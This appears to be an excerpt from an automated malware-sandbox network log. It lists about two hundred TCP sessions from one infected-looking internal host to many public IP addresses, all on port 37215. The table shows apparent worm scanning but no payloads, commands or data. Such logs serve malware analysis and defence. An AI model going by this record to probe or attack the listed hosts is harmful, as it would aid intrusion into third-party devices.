                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16478192.168.2.1343030157.76.36.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16479192.168.2.1345674197.62.108.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16480192.168.2.1347040176.208.168.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16481192.168.2.1352254157.1.56.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16482192.168.2.1355104197.88.50.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16483192.168.2.135265441.78.175.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16484192.168.2.1344442197.186.246.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16485192.168.2.1338188186.123.138.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16486192.168.2.1344588157.248.113.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16487192.168.2.1343162197.149.163.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16488192.168.2.1359848197.246.165.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16489192.168.2.134228041.194.230.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16490192.168.2.134245644.25.223.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16491192.168.2.133807441.112.111.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16492192.168.2.1340828197.198.43.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16493192.168.2.134627247.66.16.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16494192.168.2.1350752157.22.250.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16495192.168.2.1335556157.239.195.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16496192.168.2.1349410144.172.73.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16497192.168.2.134406819.40.192.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16498192.168.2.1356472157.1.209.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16499192.168.2.1338456157.129.55.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16500192.168.2.134020241.77.173.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16501192.168.2.1346124197.95.90.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16502192.168.2.1347176157.30.92.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16503192.168.2.1333434157.234.3.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16504192.168.2.1345024157.12.60.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16505192.168.2.1360406201.83.146.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16506192.168.2.1358182157.142.243.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16507192.168.2.1353682157.194.81.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16508192.168.2.1343982157.94.39.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16509192.168.2.134365641.241.34.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16510192.168.2.1332786197.47.83.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16511192.168.2.135080613.190.185.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16512192.168.2.1350412197.40.80.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16513192.168.2.1355508197.226.208.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16514192.168.2.134859423.102.236.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16515192.168.2.1334310197.215.14.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16516192.168.2.135901413.229.97.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16517192.168.2.1339380197.53.79.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16518192.168.2.134110699.134.236.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16519192.168.2.134886441.68.131.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16520192.168.2.1340674157.66.29.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16521192.168.2.1356688197.172.11.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16522192.168.2.1345026157.219.98.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16523192.168.2.1344546157.225.204.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16524192.168.2.1354000157.89.206.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16525192.168.2.1358560197.107.155.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16526192.168.2.1348958157.178.3.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16527192.168.2.133748841.179.90.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16528192.168.2.1347832181.200.211.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16529192.168.2.133880641.59.219.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16530192.168.2.1359146197.48.115.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16531192.168.2.1341824154.79.10.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16532192.168.2.1336926197.121.123.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16533192.168.2.1334720160.47.92.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16534192.168.2.1335572197.42.34.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16535192.168.2.1339112157.23.12.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16536192.168.2.1339364197.145.164.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16537192.168.2.1347346157.162.224.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16538192.168.2.1351732144.80.20.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16539192.168.2.1345594157.133.91.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16540192.168.2.1342416197.202.172.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16541192.168.2.133649043.84.179.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16542192.168.2.1353818197.31.8.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16543192.168.2.1349384157.216.63.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16544192.168.2.1360086157.8.213.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16545192.168.2.1355574197.157.27.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16546192.168.2.135331241.144.15.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16547192.168.2.135693441.16.160.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16548192.168.2.1345730104.103.100.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16549192.168.2.1346350157.139.48.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16550192.168.2.1360890197.86.55.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16551192.168.2.1352632157.252.111.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16552192.168.2.133643241.151.100.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16553192.168.2.136025041.39.7.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16554192.168.2.134108641.233.44.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16555192.168.2.1346218177.202.23.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16556192.168.2.134896241.156.117.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16557192.168.2.1334366157.32.17.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16558192.168.2.135298641.24.78.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16559192.168.2.1336950157.13.4.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16560192.168.2.1353434197.222.159.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16561192.168.2.1342284157.215.105.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16562192.168.2.1342784197.236.7.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16563192.168.2.13356862.9.104.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16564192.168.2.1357492157.11.6.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16565192.168.2.1356696157.146.130.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16566192.168.2.1341318157.132.199.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16567192.168.2.1358516203.10.145.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16568192.168.2.1357262197.172.131.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16569192.168.2.133920665.149.6.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16570192.168.2.1357890157.110.113.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16571192.168.2.134151241.49.116.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16572192.168.2.1348400157.161.120.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16573192.168.2.135475270.5.235.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16574192.168.2.1359708157.6.139.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16575192.168.2.1352844116.49.251.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16576192.168.2.134061841.176.73.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16577192.168.2.1333636197.248.66.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16578192.168.2.135571441.209.218.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16579192.168.2.1345494197.53.77.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16580192.168.2.1348636157.32.214.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16581192.168.2.134198441.206.108.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16582192.168.2.133624870.59.201.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16583192.168.2.1356112157.160.178.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16584192.168.2.1341232182.100.159.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16585192.168.2.1341492197.136.22.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16586192.168.2.1351914197.42.114.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16587192.168.2.1349924145.237.133.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16588192.168.2.135689471.181.192.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16589192.168.2.1358400157.183.36.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16590192.168.2.1338184157.19.204.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16591192.168.2.1360100197.140.171.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16592192.168.2.134782241.204.140.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16593192.168.2.1350870174.128.226.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16594192.168.2.133395441.191.118.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16595192.168.2.1345352217.142.129.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16596192.168.2.133507679.224.153.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16597192.168.2.134320082.2.214.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16598192.168.2.1353980197.6.9.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16599192.168.2.135882641.28.197.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16600192.168.2.1341238220.177.234.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16601192.168.2.1360016113.111.81.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16602192.168.2.1340826172.223.119.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16603192.168.2.1351440157.149.160.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16604192.168.2.1341586197.112.100.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16605192.168.2.1335328157.223.215.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16606192.168.2.1360308197.211.34.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16607192.168.2.1339824157.165.210.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16608192.168.2.1348080197.199.206.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16609192.168.2.133969241.132.252.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16610192.168.2.134835441.10.193.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16611192.168.2.133653460.96.242.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16612192.168.2.1339166157.34.11.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16613192.168.2.135236641.169.246.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16614192.168.2.1357628157.78.76.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16615192.168.2.1339442157.211.254.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16616192.168.2.1341592197.53.158.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16617192.168.2.134825241.237.88.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16618192.168.2.1360902197.224.246.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16619192.168.2.135544641.13.129.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16620192.168.2.1348368197.245.102.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16621192.168.2.1340000197.190.188.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16622192.168.2.1349064184.212.150.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16623192.168.2.1339686197.62.0.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16624192.168.2.1349762197.69.72.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16625192.168.2.1354702157.48.16.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16626192.168.2.134695641.212.93.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16627192.168.2.1333106203.146.196.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16628192.168.2.1334624197.1.90.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16629192.168.2.136007847.213.28.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16630192.168.2.135129424.11.71.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16631192.168.2.1335062188.195.177.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16632192.168.2.1360466197.60.195.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16633192.168.2.135407041.161.73.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16634192.168.2.1344482197.182.208.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16635192.168.2.1352550114.139.43.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16636192.168.2.1353342130.30.167.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16637192.168.2.1343098157.111.133.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16638192.168.2.1338758116.25.35.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16639192.168.2.1344578197.27.154.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16640192.168.2.134172441.195.206.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16641192.168.2.134277623.25.218.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16642192.168.2.134414243.244.99.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16643192.168.2.1356078157.109.16.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16644192.168.2.1341332157.238.195.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16645192.168.2.135644465.185.230.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16646192.168.2.134254041.0.139.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16647192.168.2.1345394197.49.199.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16648192.168.2.133874841.92.60.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16649192.168.2.1343054157.109.2.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16650192.168.2.1346544157.118.37.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16651192.168.2.135362246.59.84.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16652192.168.2.1357926197.73.212.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16653192.168.2.136073441.24.137.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16654192.168.2.1335884197.61.32.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16655192.168.2.1360840157.6.151.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16656192.168.2.1341476197.18.135.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16657192.168.2.1347568197.43.199.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16658192.168.2.1335480213.183.174.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16659192.168.2.134936267.8.54.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16660192.168.2.1348582197.173.165.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16661192.168.2.133742841.63.158.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16662192.168.2.1342958199.235.94.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16663192.168.2.1334658100.225.156.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16664192.168.2.1334716157.9.10.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16665192.168.2.1341392197.234.51.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16666192.168.2.1354882157.16.12.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16667192.168.2.1333998157.47.44.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16668192.168.2.1352842193.161.76.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16669192.168.2.1358474156.209.91.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16670192.168.2.1337544197.27.232.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16671192.168.2.1334548157.93.31.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16672192.168.2.1359810157.203.204.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16673192.168.2.1358728197.189.182.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16674192.168.2.133549241.46.88.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16675192.168.2.1354950129.195.187.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16676192.168.2.1348998185.158.231.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16677192.168.2.1360432157.236.241.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16678192.168.2.1358528197.90.86.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16679192.168.2.1338984157.23.69.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16680192.168.2.135804041.11.49.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16681192.168.2.1354326157.108.36.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16682192.168.2.1348844148.254.61.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16683192.168.2.134772441.202.174.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16684192.168.2.1351374135.11.120.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16685192.168.2.135845244.227.196.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16686192.168.2.134136041.129.180.24737215
                                                  TimestampBytes transferredDirectionData


